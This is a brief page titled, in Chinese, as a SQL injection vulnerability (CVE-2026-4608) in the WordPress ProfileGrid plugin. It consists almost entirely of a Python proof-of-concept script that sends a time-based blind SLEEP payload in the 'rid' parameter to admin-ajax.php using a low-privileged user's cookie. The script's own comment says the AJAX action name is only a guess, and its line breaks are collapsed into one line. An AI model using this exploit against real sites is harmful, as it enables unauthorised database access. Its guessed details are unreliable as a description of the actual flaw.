CVE-2026-4608: ProfileGrid插件SQL注入漏洞

import requests # Target configuration target_url = "http://target-wordpress-site.com/wp-admin/admin-ajax.php" # Vulnerable parameter 'rid' based on the CVE description # Using time-based blind SQL injection payload payload = { "action": "pm_group_fields_save", # Example action name, actual name depends on plugin code "rid": "1 AND (SELECT SLEEP(5))" # SQL Injection payload } # Cookies for a low-privileged user (Subscriber) cookies = { "wordpress_logged_in_hash": "user_session_cookie_here" } try: print("Sending exploit request...") response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) # Check if the response time indicates a successful delay (SQLi executed) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability confirmed! Response delayed due to SLEEP().") else: print("[-] Vulnerability not detected or payload incorrect.") except Exception as e: print(f"Error occurred: {e}")